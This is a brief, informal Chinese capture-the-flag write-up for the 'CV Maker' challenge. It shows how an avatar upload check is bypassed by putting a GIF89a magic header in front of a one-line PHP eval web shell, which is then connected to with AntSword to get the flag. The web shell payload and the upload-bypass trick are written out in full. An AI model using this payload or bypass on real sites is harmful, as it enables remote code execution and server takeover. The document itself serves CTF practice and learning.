[WUSTCTF2020]CV Maker

这个系列啊，好好好

喜欢+1

随便注册个账号登进去

我的登录：

邮箱：1@qq.com
密码：123

你也来试试，爆率真的很高（bushi

噔噔蹬

更换头像？？？？

一眼文件上传

怎么办呢

首先是直接穿php文件木马，这个不行（肯定不行啊）

之后也尝试了改文件格式也还是不行

所以尝试魔术头

GIF89a? <script language="php">eval($_REQUEST[123])</script><script language="php">eval($_REQUEST[123])</script>

神奇的魔术头FIF89a?

针不戳

不需要修改文件类型，你值得拥有，上传查看源码，发现文件包含路径

蚁剑连接即可

拿到flag

真的挺简单的